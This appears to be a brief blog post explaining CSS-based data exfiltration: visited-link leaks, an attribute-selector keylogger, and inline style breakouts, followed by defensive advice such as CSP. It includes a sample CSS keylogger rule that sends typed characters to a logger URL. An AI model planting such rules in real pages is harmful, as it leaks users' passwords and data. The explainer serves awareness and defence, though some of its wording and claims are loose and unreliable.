CSS Exfil Vulnerability

CSS is a stylesheet designed to make a webpage to look awesome. Every designer and developer comes across CSS while building their pages into the web. All of the modern web is highly dependant on CSS. Recent updates from the security experts are that CSS too can be used as a tool to exploit the websites or applications online. Using CSS, hackers can steal sensitive information without the consent of the user.

This vulnerability is termed to be CSS Exfil Vulnerability. It is so powerful that the TOR can also be de-anonymized to grab the data.

    There are few methods of exploitation using CSS and they are as follows:

  • The Visited Link
  • KeyLogger Steal Data
  • Inline Style Block
  • And many more in the list

The Visited Link method

Using this method, the attacker can know the links that were frequently clicked on and by embedding a line of CSS that extract user information. This can be done in a way that the user can never expect the trick to work in a certain way.
If I have a link on my page as Click Here.
And, my user has clicked on it to navigate into another page.
The style can be applied as a: visited{ color: darkblue; } which cannot be a default user agent style.
Upon clicking that link, which has a style like background-image: url(/grab-data/script.php);
Any developer can be worried by looking at this code.
Well, the updated browsers have prevented this from occurring, disallowing the attackers to steal your sensitive information.

KeyLogger method

When we have a password input on our page, this is the right time to get worried about. Using the logger script as the input’s background image, the user information can be captured and stored before sending it to another server.
input[value^="a"] { background: url(logger.php?v=a); }
This method isn’t easy as it says. The value attribute doesn’t change as we type into it, but when we use some Frameworks like React, this might happen. And this is just a theory.
Using Javascript makes the code more vulnerable to attachers, on the page. A keylogger can be just a few lines of javascript code ready to transfer the typed data using AJAX.
There are various methods to eradicate this kind of behavior. XSS injected inline Javascript and third-party is now stoppable with Content Security Policy (CSP) but so is CSS.
So, this isn’t much scary as you thought.

Using Inline Style Block

The inline style can be very harmful when the attacher closes the style and opens a script tag to execute some notorious code.
A very suggestive method is not to use inline styles.

And many more methods….

    Some of the most common vulnerabilities are:

  • Hijacked browser extensions
  • Accidentally added DOM elements
  • Malicious 3rd-party components
  • Reflected or stored code injection vulnerabilities

Some methods can extract CSRF token in just 10 seconds using the CSS injection. Using the stolen CSFR token, an attacker can victimize the site in very less time.

Suggestive precautions

The best practices can help your site from being attacked. Researchers suggest developers and site owners follow the CSP to limit the authority of the attacker on the website. Fixing flaws in code injection and using an appropriate application firewall is better to adopt. Users need to stop executing CSS directly in the browser.
Security experts had submitted plugins for famous and popular browsers to defend against Exfil attacks.